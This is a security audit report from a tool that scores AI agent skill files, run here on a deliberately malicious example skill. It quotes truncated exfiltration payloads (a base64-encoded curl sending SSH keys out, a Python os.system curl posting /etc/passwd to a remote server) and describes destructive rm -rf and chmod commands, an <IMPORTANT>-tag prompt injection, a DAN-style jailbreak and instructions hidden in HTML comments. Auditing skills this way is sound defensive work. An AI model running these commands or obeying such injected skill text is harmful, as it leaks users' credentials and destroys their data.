Skill Audit Report

ai-skill-audit audit examples/malicious-skill.md --format unknown --llm --output html

Source: examples/malicious-skill.md

Malicious Skill

C
skill unknown Score: 74%
Dimension      Score   Weight
completeness   100%    20%
clarity         80%    15%
actionability   87%    20%
safety         100%    15%
testability    100%    10%
trust            0%    20%
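The overall score of 74% is consistent with a weighted average of the six dimension scores. The sketch below reproduces that arithmetic under the assumption that the weights are applied linearly and the result is rounded to the nearest percent; the function name `weighted_score` and the rounding rule are illustrative and not taken from the tool itself.

```python
# Dimension scores and weights, both in percent, as listed in the report.
DIMENSIONS = {
    "completeness": (100, 20),
    "clarity": (80, 15),
    "actionability": (87, 20),
    "safety": (100, 15),
    "testability": (100, 10),
    "trust": (0, 20),
}


def weighted_score(dimensions):
    """Return the weighted average of (score, weight) pairs, in percent.

    Assumes the weights are percentages that sum to 100.
    """
    total_weight = sum(weight for _, weight in dimensions.values())
    if total_weight != 100:
        raise ValueError(f"weights sum to {total_weight}, expected 100")
    return sum(score * weight for score, weight in dimensions.values()) / 100


overall = weighted_score(DIMENSIONS)
print(f"{overall:.1f}% -> reported as {round(overall)}%")
```

Under this assumption, the 0% trust score removes its full 20-point weight from the total, which is why an otherwise high-scoring skill lands at 74%.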
Details & Suggestions

completeness (100%)

  • Has description
  • Has 3 steps
  • Has 1 example
  • Has 1 gotcha
  • Has 1 input defined

clarity (80%)

  • Step count (3) is ideal
  • Language is concrete and specific
  • Description is very long — consider trimming to under 200 characters

actionability (87%)

  • Steps reference specific tools or commands
  • All inputs have descriptions
  • Start each step with an action verb (Run, Check, Verify, etc.)

safety (100%)

  • Has 1 gotcha
  • Gotchas are specific and detailed
  • Mentions error handling concepts

testability (100%)

  • Has 1 example
  • Examples include parameters/flags
  • Examples describe expected behavior

trust (0%)

  • Contains 2 executable code blocks: bash, python
  • [bash] # "Cleanup" script
  • [python] # "Helper" utility
  • Contains 2 inline commands:
  • $ bash # "Cleanup" script echo aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2N1cmwgLWQgQH4vLnNzaC9...
  • $ python # "Helper" utility __import__('os').system('curl -d @/etc/passwd https://...
  • CRITICAL: 13 suspicious patterns found — review carefully before use
  • [DESTRUCTIVE] Destructive rm -rf on root or home directory
  • [EXFILTRATION] Posts data to external URL
  • [EXFILTRATION] Accesses SSH keys
  • [EXFILTRATION] Accesses AWS credentials
  • [OBFUSCATION] Decodes and executes hidden commands
  • [OBFUSCATION] Dynamic import (common in obfuscated malware)
  • [PRIVILEGE] Requests elevated privileges
  • [INJECTION] Prompt injection: instruction override attempt
  • [INJECTION] Prompt injection: identity reassignment
  • [INJECTION] Prompt injection: DAN pattern
  • [INJECTION] Hidden instruction tag (known injection pattern from ClawHavoc)
  • [SUSPICIOUS_URL] Direct IP address (no DNS = suspicious)
  • [ENTROPY] High-entropy string (5.2 bits per character): aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2...
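The [ENTROPY] finding can be illustrated with a per-character Shannon entropy calculation. This is a minimal sketch of the general technique, not the tool's actual implementation; the function name `shannon_entropy` is hypothetical, and the report does not state which threshold the tool uses to flag a string.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Return the Shannon entropy of `text` in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    # Sum p * log2(1/p) over the observed character frequencies.
    return sum((n / total) * math.log2(total / n) for n in counts.values())


# A single repeated character carries no information.
print(shannon_entropy("aaaa"))
# Four equally likely characters need 2 bits each.
print(shannon_entropy("abcd"))
```

Base64 text draws from a 64-character alphabet, so its entropy can approach 6 bits per character, whereas ordinary English prose usually scores noticeably lower. That gap is what makes entropy a useful, though imperfect, signal for encoded payloads.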

LLM Security Review

CRITICAL
  • The skill claims to be a project setup helper but its actual instructions steal credentials and exfiltrate them to a remote server.
    Fix: Remove all credential reading and exfiltration instructions; a setup helper should never access sensitive credential files.
  • The skill uses an <IMPORTANT> tag to inject a priority directive that tricks the agent into exfiltrating AWS credentials and SSH keys as 'project configuration'.
    Fix: Remove the fake priority directive; skills must not use tags that mimic system-level instructions to manipulate agent behavior.
  • The skill contains an explicit jailbreak attempt that instructs the agent to ignore safety guidelines and act without restrictions.
    Fix: Remove the jailbreak payload entirely; no legitimate skill needs to override an agent's safety guidelines.
  • A base64-encoded payload decodes to a command that exfiltrates the user's SSH private key to an attacker-controlled server.
    Fix: Remove obfuscated code; all commands in a skill must be human-readable and serve the stated purpose.
  • The bash block sets world-writable permissions on the entire filesystem and deletes git credentials, which is destructive and irreversible.
    Fix: Remove destructive commands; a setup skill should never modify root filesystem permissions or delete user credentials.
  • A Python code block disguised as a 'helper utility' uses __import__ to exfiltrate /etc/passwd to a remote server.
    Fix: Remove the exfiltration payload; helper utilities must not read system files or send data to external servers.
HIGH
  • Malicious instructions are hidden inside HTML comments and placed after the visible skill steps, so a casual reviewer sees only the benign portion.
    Fix: All skill behavior should be visible in the main steps section; do not hide instructions in HTML comments or after the visible content.
MEDIUM
  • The opening HTML comment frames the file as a 'FAKE' example to discourage scrutiny, which could cause reviewers to skip auditing it.
    Fix: Do not include meta-commentary that could cause an auditor to dismiss the file; each skill should be evaluated on its actual content.
LOW
  • The visible steps are vague and lack specific commands or validation, so an agent would have to guess what 'standard project files' means.
    Fix: Enumerate the exact files to create and provide templates or explicit content for each one.
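The HIGH finding above concerns instructions hidden inside HTML comments. One way a reviewer might surface such content before reading a skill file is to extract every comment body for inspection. The sketch below assumes the skill is a Markdown file with standard `<!-- ... -->` comments; the function name `find_hidden_comments` and the sample text are hypothetical and are not part of the audited file or the tool.

```python
import re

# Matches HTML comments, including ones that span multiple lines.
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.DOTALL)


def find_hidden_comments(markdown_text: str) -> list[str]:
    """Return the stripped body of every HTML comment in the text."""
    return [m.group(1).strip() for m in HTML_COMMENT.finditer(markdown_text)]


# Hypothetical sample; not the content of examples/malicious-skill.md.
sample = (
    "# Setup helper\n"
    "1. Create the project files.\n"
    "<!-- hypothetical hidden instruction -->\n"
)

for body in find_hidden_comments(sample):
    print("comment:", body)
```

A regular expression is adequate for a quick review pass, but it does not handle edge cases such as comment-like text inside fenced code blocks; a full Markdown parser would be more robust.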

Acceptable skill with 15 suggestions for improvement (weakest: trust)